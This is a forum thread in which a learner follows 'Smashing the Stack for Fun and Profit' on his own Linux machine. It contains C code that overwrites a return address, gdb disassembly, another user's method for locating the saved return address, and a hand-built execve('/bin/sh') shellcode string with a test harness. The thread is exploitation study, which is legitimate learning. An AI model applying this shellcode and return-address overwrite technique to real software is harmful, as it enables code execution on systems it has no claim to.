The Case of the Phantom Return Address Pointer
Hello HBH Disclaimer: This is all being done on my own personal linux box, so no laws are being violated or anything like that. And on that note, if anyone has any questions about my box, i can go into more detail.
I need some help. I've been following along the example C code in "Smashing the Stack for Fun and Profit" on my (yes MY) linux box. It's a 64 bit AMD processor running Linux maverick. I got in to the third example in the paper, and I got hung up. Here's my code.
#include <stdio.h>
void function(int a, int b, int c)
{
char buffer1[5];
char buffer2[10];
int *ret;
ret = buffer1 + 24;
//printf("0x%x\n", *ret);
(*ret) += 8;
__asm__("jmp .L3");
}
void main()
{
int x;
x = 0;
function(1, 2, 3);
x = 1;
printf("%d\n", x);
}
The concept is simple. The code calls function, which allocates buffer1 and buffer2. Buffer 1 is word aligned to 8 bytes in the stack, and then above it is the previous execution block pointer, and the return address pointer, coming to 12 bytes total, or 24 bytes (correct me if I'm wrong) since I'm on a 64 bit machine. The code starts with the location of buffer1, then adds 24 which should get us to the location of the return address. It then adds 8 in hopes of skipping over the "x = 1;" assignment in main(). The inline assembly jumps over a part of code the compiler adds to check that the stack isn't being smashed (see below). Two looks at the assembly follow.
Here's the result of calling gcc -S example3.c -o example3.s
.file "example3.c"
.text
.globl function
.type function, @function
function:
pushl %ebp
movl %esp, %ebp
subl $40, %esp
movl %gs:20, %eax
movl %eax, -12(%ebp)
xorl %eax, %eax
leal -33(%ebp), %eax
addl $24, %eax
movl %eax, -28(%ebp)
movl -28(%ebp), %eax
movl (%eax), %eax
leal 8(%eax), %edx
movl -28(%ebp), %eax
movl %edx, (%eax)
#APP
# 14 "example3.c" 1
jmp .L3
# 0 "" 2
#NO_APP
movl -12(%ebp), %eax
xorl %gs:20, %eax
je .L3
call __stack_chk_fail
.L3:
leave
ret
.size function, .-function
.section .rodata
.LC0:
.string "%d\n"
.text
.globl main
.type main, @function
main:
pushl %ebp
movl %esp, %ebp
andl $-16, %esp
subl $32, %esp
movl $0, 28(%esp)
movl $3, 8(%esp)
movl $2, 4(%esp)
movl $1, (%esp)
call function
movl $1, 28(%esp)
movl $.LC0, %eax
movl 28(%esp), %edx
movl %edx, 4(%esp)
movl %eax, (%esp)
call printf
leave
ret
.size main, .-main
.ident "GCC: (Ubuntu/Linaro 4.4.4-14ubuntu5) 4.4.5"
.section .note.GNU-stack,"",@progbits
and a look at the main function from gdb:
(gdb) disassemble main
Dump of assembler code for function main:
0x08048457 <+0>: push %ebp
0x08048458 <+1>: mov %esp,%ebp
0x0804845a <+3>: and $0xfffffff0,%esp
0x0804845d <+6>: sub $0x20,%esp
0x08048460 <+9>: movl $0x0,0x1c(%esp)
0x08048468 <+17>: movl $0x3,0x8(%esp)
0x08048470 <+25>: movl $0x2,0x4(%esp)
0x08048478 <+33>: movl $0x1,(%esp)
0x0804847f <+40>: call 0x8048414 <function>
0x08048484 <+45>: movl $0x1,0x1c(%esp)
0x0804848c <+53>: mov $0x8048570,%eax
0x08048491 <+58>: mov 0x1c(%esp),%edx
0x08048495 <+62>: mov %edx,0x4(%esp)
0x08048499 <+66>: mov %eax,(%esp)
0x0804849c <+69>: call 0x8048338 <printf@plt>
0x080484a1 <+74>: leave
0x080484a2 <+75>: ret
End of assembler dump.
We can see from gdb that 8 bytes is indeed the magic number to skip from <+45> to <+53>
So it all looks good right? Wrong! The code doesn't work. It runs fine, but x always winds up getting assigned to 1, even though I'm screwing around with the stack. So maybe the ret = buffer1 +24; line is wrong… Well I tried every value from ret = buffer1+ 0; all the way to ret = buffer1 + 33; Incrementing by 1 and recompiling every time. at buffer1 +33; i get a seg fault, leading me to believe I've overshot the return address. So what gives? The way I see it, x should either not get assigned to 1 at some point, or i should have screwed up the stack and gotten undefined behavior, but neither one happened for any value I added to buffer1. So I'm at a loss. Where the heck is the return address? What's going wrong? Someone please smash my stack!
Are you sure you're running on a 64-bit system?
Did you generate this assembly code with gdb yourself or is it from somewhere else?
(gdb) disassemble main
Dump of assembler code for function main:
0x08048457 <+0>: push %ebp
0x08048458 <+1>: mov %esp,%ebp
0x0804845a <+3>: and $0xfffffff0,%esp
0x0804845d <+6>: sub $0x20,%esp
0x08048460 <+9>: movl $0x0,0x1c(%esp)
0x08048468 <+17>: movl $0x3,0x8(%esp)
0x08048470 <+25>: movl $0x2,0x4(%esp)
0x08048478 <+33>: movl $0x1,(%esp)
0x0804847f <+40>: call 0x8048414 <function>
0x08048484 <+45>: movl $0x1,0x1c(%esp)
0x0804848c <+53>: mov $0x8048570,%eax
0x08048491 <+58>: mov 0x1c(%esp),%edx
0x08048495 <+62>: mov %edx,0x4(%esp)
0x08048499 <+66>: mov %eax,(%esp)
0x0804849c <+69>: call 0x8048338 <printf@plt>
0x080484a1 <+74>: leave
0x080484a2 <+75>: ret
End of assembler dump.
I thought the registers on AMD 64 bit processors were RSP and RBP, not ESP and EBP which are used in x86 processors (maybe others as well)
My machine is def 64bit. Whether or not it compiled in 64bit is a different story. You might be right about the registers being 32 bit. Ill have to verify on my end. All code shown, incl. Gdb output is my own, (but the example3.c is a v. Minor modification from the code in aleph's paper, of course). I think i forgot to mention my compileline
Gcc -g1 example3.c -o example3
Im going to play with
Gcc example3.c -o example3 -fno-stack-protector Tonight. Although i'd still like to figure this out so it will work even without the -fno. Ill have to investigate what exactly the stack protector does.
It might be more of a question for google, but the Xorl %gs:20, %eax Looks suspicious. Im not really sure what the %gs register is or how : works, so ill just have to pour over AMD's (hueg) documentation.
Thanks for the help! Ill get on it tonight and post updates.
I've managed to get that example working on 32 bit and 64 bit (virtual) machines.
32 bit (with gcc 4.4.5):
ret = buffer1 + 37;
(*ret) += 8;
64 bit (with gcc 4..5.2):
ret = buffer1 + 24;
(*ret) += 7;
Would you be able to try them both out? If one works for you I can tell you where I got those numbers from.
Also, you say you're using Ubuntu 10.10. The default download on their site is for the 32 bit version. You could be running this but still be using 64 bit hardware, in which case I'd guess you'd use 32 bit code (though I'm not sure)
MercuryTW wrote: Gcc -g1 example3.c -o example3 Why not use -g instead of -g1? As far as I know, -g1 just contains less debugging information. I'm sure you're not having problems with the file size of this example.
MercuryTW wrote: It might be more of a question for google, but the Xorl %gs:20, %eax Looks suspicious. Im not really sure what the %gs register is or how : works, so ill just have to pour over AMD's (hueg) documentation. Sorry, I don't know what the %gs register is for either.
EDIT: Added GCC versions used
Ill have to check out that code as soon as i get home. As for using -g and -g1, im actually slightly worried about what the -gX flags are doing exactly. Theres the possibility that the debugging output is placing mysterious stuff in my assembly that could be screwing up my logic. Being that im quite unfortunately unfamiliar with gdb (print statement debugging all the way =P ), im only using gdb to verify the offset by which i have to modify the return address (via (gdb) disassemble main ) So im not really all that worried about the level of debug info generated, although im sure id probably benefit from what gdb can do if i sat down and learned the #^%~ thing
starofale, you're amazing. According to your logic, I am indeed compiling into 32 bits. I tried
ret = buffer1 + 37;
(*ret) += 8;
and it worked like a charm, first try. Interestingly enough, I was even able to take out the asm("jmp .L3"); line, and it still worked. Stack protector my ass.
compilation line was gcc example3.c -o example3
So where did you wind up getting the 37 from?
Layout of the stack:
This is for a 32 bit processor. A 64 bit is stack is pretty much the same, you will just need to use RSP and RBP instead of ESP and EBP.
Step 1 - Find location of return address To be able to change the return address, you will first need to find out where the return address is being stored relative to buffer1.
You will need to compile your program with debugging information included for this to work.
In GDB, set a breakpoint in function() (break function) and run the program (run). Get the address of buffer1 by typing: print &buffer1 (I'll call this value x) You can get the address pointed at by EBP in gdb with: print /x $ebp (I'll call this value y) The location the return address is stored in is is 4 bytes after EBP (8 on a 64 bit system).
i.e. location of return address = y+4
let z be the difference between the locations of the return address and buffer1: z = y+4 - x
Convert z to decimal and then replace the following line in your code with the result
markupret = buffer1 + z;
(Put in the value of z directly - not as a variable)
On my computer I got:
x = print &buffer1 = 0xbffff397
y = print /x $ebp = 0xbffff3b8
z = y+4 - x = 25 (in hex) = 37 (in decimal)
markupret = buffer1 + 37;
Step 2 - Change return address Next you need to find out what to set the return address to. You want to skip the instruction that tells the computer to add 1 to x. In GDB when you disassembled main() you got:
...
0x0804847f <+40>: call 0x8048414 <function>
0x08048484 <+45>: movl $0x1,0x1c(%esp)
0x0804848c <+53>: mov $0x8048570,%eax
...
The instruction at +40 calls function() and the default return address will then point to the next instruction (+45). However, it is this instruction at +45 that increases x by 1, so we want to skip this by setting the return address to the instruction at +53 (2 instructions after the function call).
In this case, the difference between the default return address and your desired return address is 53 - 45 = 8, so write:
markup(*ret) += 8;
Then your program ends up as:
#include <stdio.h>
void function(int a, int b, int c)
{
char buffer1[5];
char buffer2[10];
int *ret;
ret = buffer1 + 37;
(*ret) += 8;
}
void main()
{
int x;
x = 0;
function(1, 2, 3);
x = 1;
printf("%d\n", x);
}
And just when I thought I was finally making progress…
The next step in the tutorial is disassembling the following code to understand how execve works.
#include <stdio.h>
void main[]
{
char * name[2];
name[0] = "/bin/sh";
name[1] = 0;
execve(name[0], name, 0);
}
main method is just the same as in the tutorial, but the assembly behind execve differs significantly from the tutorial. I tried looking into the issue on google, but all i really found was a bunch of prepackaged shellcode, nothing that really explains this system call. In hopes of avoiding being doomed to script kiddie-dom, I'd like to actually understand what's going on in execve. Here's the gdb disassembly from gcc -g -static shellcode.c -o shellcode -fno-stack-protector
Dump of assembler code for function main:
0x080482c0 <+0>: push %ebp
0x080482c1 <+1>: mov %esp,%ebp
0x080482c3 <+3>: and $0xfffffff0,%esp
0x080482c6 <+6>: sub $0x20,%esp // End Prologue, alloc 32Bdecimal
0x080482c9 <+9>: movl $0x80ae728,0x18(%esp) // Move the location of the "/bin/sh" string into stack @ loc StackPtr + 24decimal
0x080482d1 <+17>: movl $0x0,0x1c(%esp) // Move NULL into the stack @ loc StackPtr + 28decimal
0x080482d9 <+25>: mov 0x18(%esp),%eax // Move the location of the "/bin/sh" string into eax register
0x080482dd <+29>: movl $0x0,0x8(%esp) // Move NULL into the stack @ loc Stack ptr + 8decimal
0x080482e5 <+37>: lea 0x18(%esp),%edx // Load Effective Address of the name[] array and store it in edx
0x080482e9 <+41>: mov %edx,0x4(%esp) // Move the EAX of the name[] array and put it at StackPtr + 4Bdecimal
0x080482ed <+45>: mov %eax,(%esp) // Move the location of the "/bin/sh" string and put it at stackPtr
0x080482f0 <+48>: call 0x8052ef0 <execve> // Call execve and push the return @ ptr onto the stack
0x080482f5 <+53>: leave
0x080482f6 <+54>: ret
End of assembler dump.
Dump of assembler code for function execve:
0x08052ef0 <+0>: push %ebp // Push the pebp onto the stack
0x08052ef1 <+1>: mov %esp,%ebp // Set EBP to ESP
0x08052ef3 <+3>: mov 0x10(%ebp),%edx // Move NULL from the parameters (@ loc ebp+16Bdec) to EDX register
0x08052ef6 <+6>: push %ebx // push EBX onto the stack --??? this probably preserves it so it can be restored at <+31
0x08052ef7 <+7>: mov 0xc(%ebp),%ecx // move Effective AX of name[] (@loc ebp + 12Bdec) into ECX register
0x08052efa <+10>: mov 0x8(%ebp),%ebx // move loc of "/bin/sh" (@loc ebp +8Bdec) into EBX register
0x08052efd <+13>: mov $0xb,%eax // move 11dec into register EAX. 11 is the index into the syscall table. 11 is execve
0x08052f02 <+18>: call *0x80ce088 // perform the system call? maybe?
0x08052f08 <+24>: cmp $0xfffff000,%eax // compare the contents of $0xfffff000 with EAX
0x08052f0d <+29>: ja 0x8052f12 <execve+34> // If the contents of EAX are strictly greater than the contents of $0xfffff000, jump down
0x08052f0f <+31>: pop %ebx // Pop top of stack to EBX
0x08052f10 <+32>: pop %ebp // Pop top of stack to EBP
0x08052f11 <+33>: ret
0x08052f12 <+34>: mov $0xffffffe8,%edx // move this value into EDX
0x08052f18 <+40>: neg %eax // Take the two's complement of EAX
0x08052f1a <+42>: mov %gs:0x0,%ecx // Take the first longword out of the GS segment and put it in ECX
0x08052f21 <+49>: mov %eax,(%ecx,%edx,1) // Fuck if I know what's going on here
0x08052f24 <+52>: or $0xffffffff,%eax // Take the OR of 0 and EAX, store results in EAX
0x08052f27 <+55>: jmp 0x8052f0f <execve+31> // jump back up
End of assembler dump.
things make sense down to the call line (<+18>). It says in the tutorial that sometimes far calls are used to do a system call, but that doesn't really make sense since AMD does have the instruction SYSCALL for doing system calls. I tried investigating what's going on at 0x80ce088 (from the call line), but its just more and more inscrutable instructions. So what the heelllll is going on in this execve call? Or If someone could at least tell me how I should approach this issue, I'd be very grateful.
MercuryTW wrote: It says in the tutorial that sometimes far calls are used to do a system call, but that doesn't really make sense since AMD does have the instruction SYSCALL for doing system calls. The syscall instruction is for 64-bit systems. 32-bit x86's use 'int 0x80' to trigger system calls.
I tried investigating what's going on at 0x80ce088 (from the call line), but its just more and more inscrutable instructions. The system call has to be buried somewhere in there. If you can't understand any of the code you could post it here.
Here's the code that's found on the other end of the far call
If anyone would like to see more of it, I can post another link with more disassembly. The code seems to be really bizzare. The only thing I could possibly think of is that this is part of the assembly from sh, the program I'm trying to exec.
Ok, so ignoring my last post, I'm stuck again. I have here a small shellcode tester that doesn't really seem to be working. Here's the general idea of what I'm trying to do:
syntax-> string_addr_addr refers to the address of where in memory the string address is stored.
i.e., if we put the string address at location $0x123, then string_addr_addr = $0x123
movl string_addr, string_addr_addr # take the address of our string, and put it in memory
movb $0x0, null_byte_addr # take a null byte, and put it in memory (???)
movl $0x0, null_addr # take a null (32b), and put it in memory
mov $0xb, %eax # take a zero-extended null byte (32b, after extension) and put it in eax, representing the execve system call
mov string_addr, %ebx # take the address of the string, and put it into the EBX register
lea string_addr, %ecx # take the addr of the addr of the string and put it into the ECX register
lea null_string, %edx # take the null string we made and put it into the edx register
int $0x80 # perform system call
mov $0x1, %eax # move exit syscall into the eax register
mov $0x0, %ebx # move exit status into the ebx register
int $0x80 # perform system call
(optional) hlt # halt operation
/bin/sh string goes here
closer into the real thing,
jmp offset-to-call # jump to CALL
pop %esi # snag the string's address (put in the stack by CALL)
mov %esi, array-offset(%esi) # store the string_addr
movb $0x0, nullbyteoffset(%esi) # put the nullbyte away
movl $0x0, null-offset(%esi) # store the null string
mov $0xb, %eax
mov %esi, %ebx # store the string address
lea array-offset(%esi), %ecx # store the addr of the addr of the string and put it into the ecx register
lea null-offset(%esi), %edx # put null in the edx register
int $0x80
mov $0x1, %eax
mov $0x0, %ebx
int $0x80
call offset-to-pop
.string \"/bin/sh\"
jmp 0x2f # 6 B
pop %esi # 1 B
mov %esi, 0x8(%esi) # 3 B
movb $0x0, 0x7(%esi) # 4 B
movl $0x0, 0xc(%esi) # 7 B
mov $0xb, %eax # 5 B
mov %esi, %ebx # 2 B
lea 0x8(%esi), %ecx # 3 B
lea 0xc(%esi), %edx # 3 B
int $0x80 # 2 B
mov $0x1, %eax # 5 B
mov $0x0, %ebx # 5 B
int $0x80 # 2 B
call -0x2a # 5 B
.string \"/bin/sh\"
and the corresponding C code for the test:
char shellcode[] = "\xe9\x93\x7c\xfb\xf7\x5e\x89\x76\x08\xc6\x46"
"\x07\x00\xc7\x46\x0c\x00\x00\x00\x00\xb8\x0b\x00\x00\x00\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00"
"\x00\x00\xcd\x80\xe8\x0b\x7c\xfb\xf7"
"\x2f\x62\x69\x6e\x2f\x73\x68\x00\x5d\xc3";
void main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
The problem is that it seg faults. I have no idea how to even begin debugging this. I'm about 95% certain that the CALL and JMP have the right relative addresses on them.
note that the above was compiled as gcc testsc.c -o testsc -fno-stack-protector
If anyone could help point me in the right direction, that'd be great. Thanks.